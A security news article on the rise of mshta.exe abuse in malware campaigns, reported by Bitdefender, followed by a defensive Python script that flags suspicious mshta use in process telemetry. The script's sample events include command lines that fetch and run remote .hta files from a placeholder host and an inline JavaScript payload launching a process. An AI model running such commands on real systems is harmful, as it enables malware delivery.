Experts Warn Microsoft Legacy Tool Is Being Abused To Launch Malware Campaigns
Cybercriminals are increasingly exploiting a legitimate legacy Windows tool to deliver malware, with researchers warning that Microsoft HTML Application Host, known as MSHTA, is being used in a growing number of attacks.
A new report from Bitdefender has found a rise in MSHTA-related activity since the start of 2026, with attackers using the tool to deploy infostealers, loaders and more persistent malware threats.
MSHTA (mshta.exe) is a legitimate Windows utility that runs HTML Application files, known as HTAs. Unlike a standard web page, which is confined to the browser's security sandbox, an HTA runs as a trusted local application: its embedded VBScript or JScript can instantiate COM objects such as WScript.Shell and so spawn processes, read files and otherwise interact directly with the operating system. It does this with the full privileges of the user who launched it, not with privileges beyond that user's, but it escapes every restriction a browser would normally impose on script.
That capability has made the ageing tool attractive to cybercriminals.
According to Bitdefender, the increase in MSHTA-related activity appears more likely to reflect malicious use than a return to legitimate administrative adoption, particularly as normal use of the tool continues to decline.
Researchers said MSHTA is being abused across a wide range of cyber campaigns, from simple commodity malware attacks to more advanced and persistent threats.
At the simpler end, attackers are using MSHTA to deliver infostealers such as Amatera and LummaStealer, as well as loaders including CountLoader and Emmenthal. These tools are commonly used to steal credentials, collect sensitive data or install further malware on compromised systems.
Bitdefender also observed more complex campaigns involving threats such as ClipBanker and PurpleFox, showing that MSHTA remains useful to both opportunistic criminals and more sophisticated operators.
The researchers said the breadth of activity shows why defenders still need to pay attention to MSHTA. Rather than being tied to one malware family or one type of intrusion, it is being used across everything from basic malware delivery to longer-term compromise.
Security researchers say the trend reflects a broader problem for defenders: old and legitimate system utilities can be difficult to block outright, but they are increasingly being used by attackers to bypass security controls and run malicious scripts.
Because mshta.exe is a Microsoft-signed binary that ships with every Windows installation, activity involving it can pass controls that trust a publisher or a file location, and may not look suspicious at first glance. Attackers can use it to run code, download malware or launch scripts while hiding behind a legitimate process.
Bitdefender has urged organisations to reduce their exposure by restricting outdated scripting utilities such as mshta.exe and wscript.exe wherever possible, for example through application-control policies (AppLocker or Windows Defender Application Control) that block the binaries for users who have no business need for them.
The company also recommends replacing legacy scripting tools with modern alternatives, improving user awareness, and deploying layered security controls capable of detecting malicious scripts and suspicious command-line behaviour.
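To make the "suspicious command-line behaviour" recommendation concrete, the script below is an added example written for this article, not Bitdefender's tooling or any detection content from the report. It scores process-creation records for mshta.exe against a handful of patterns that are well documented for this tool: a remote URL or UNC path as the argument, an inline `vbscript:` or `javascript:` payload instead of an .hta file, an .hta launched from a user-writable location, a parent process such as an Office or mail application, and a renamed copy of the binary identified through its `OriginalFileName`. The field names follow Sysmon Event ID 1 conventions; the sample events, the list of suspicious parents and the set of user-writable directories are this example's assumptions.

```python
"""Score process-creation telemetry for suspicious mshta.exe use.

Added example for this article; not code from the Bitdefender report.
Field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine,
OriginalFileName). The JSON lines below are constructed sample data.
"""
import json
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample telemetry (assumption: Sysmon-style field names).
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\mshta.exe","OriginalFileName":"MSHTA.EXE","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"mshta.exe https://example.invalid/update.hta"}
{"Image":"C:\\Windows\\System32\\mshta.exe","OriginalFileName":"MSHTA.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.hta\""}
{"Image":"C:\\Windows\\System32\\mshta.exe","OriginalFileName":"MSHTA.EXE","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"mshta.exe \"javascript:close(new ActiveXObject('WScript.Shell').Run('calc.exe'))\""}
{"Image":"C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe","OriginalFileName":"MSHTA.EXE","ParentImage":"C:\\Windows\\System32\\wscript.exe","CommandLine":"svc.exe http://example.invalid/a.hta"}
{"Image":"C:\\Windows\\System32\\mshta.exe","OriginalFileName":"MSHTA.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Program Files\\Vendor\\Console\\admin.hta\""}
{"Image":"C:\\Windows\\System32\\notepad.exe","OriginalFileName":"NOTEPAD.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe https://example.invalid/notes.txt"}
"""

# http(s)/ftp URL or a UNC path (\\server\share) given to mshta.
REMOTE_SOURCE = re.compile(r"(https?|ftp)://|\\\\[^\\\s]+\\", re.IGNORECASE)
# Inline script passed instead of an .hta file: no file ever touches disk.
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
# Directories a standard user can write to (assumption: tune per estate).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
# Parents that rarely have a legitimate reason to spawn mshta (assumption).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "msedge.exe", "chrome.exe", "firefox.exe",
    "wscript.exe", "cscript.exe", "powershell.exe",
}
HIGH_SEVERITY = {"renamed_binary", "remote_source", "inline_script"}


@dataclass
class Finding:
    command_line: str
    parent: str
    reasons: list
    severity: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_mshta(event: dict) -> bool:
    # Match the PE version-resource name as well as the path, so a copied or
    # renamed mshta.exe is still recognised.
    return (basename(event.get("Image", "")) == "mshta.exe"
            or event.get("OriginalFileName", "").lower() == "mshta.exe")


def analyze_event(event: dict) -> Optional[Finding]:
    if not is_mshta(event):
        return None
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons = []
    if basename(event.get("Image", "")) != "mshta.exe":
        reasons.append("renamed_binary")
    if REMOTE_SOURCE.search(cmd):
        reasons.append("remote_source")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline_script")
    if USER_WRITABLE.search(cmd):
        reasons.append("user_writable_path")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent:{parent}")
    if not reasons:
        return None  # e.g. a vendor .hta under Program Files run from Explorer
    severity = "high" if HIGH_SEVERITY & set(reasons) else "medium"
    return Finding(cmd, parent, reasons, severity)


def analyze(text: str) -> list:
    return [f for f in map(analyze_event, parse_events(text)) if f is not None]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"[{finding.severity}] parent={finding.parent} "
              f"reasons={','.join(finding.reasons)}\n    {finding.command_line}")
```

Run against the constructed sample, the script flags the Word-spawned download, the .hta in a Temp directory, the inline JavaScript payload and the renamed copy, and stays silent on the vendor console launched from Explorer. Matching on `OriginalFileName` rather than the path alone is the detail most worth carrying into a real rule, since copying the binary elsewhere defeats a path-based check but not the version resource.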
Users are also being warned not to download untrusted files, run unexpected commands or open suspicious attachments, particularly if they arrive through unsolicited emails or messages.
The findings highlight how even old software components can become modern attack tools when they remain enabled across business environments.
As malware campaigns continue to evolve, experts say organisations must look beyond obvious threats and pay closer attention to the legitimate tools attackers are quietly turning against them.
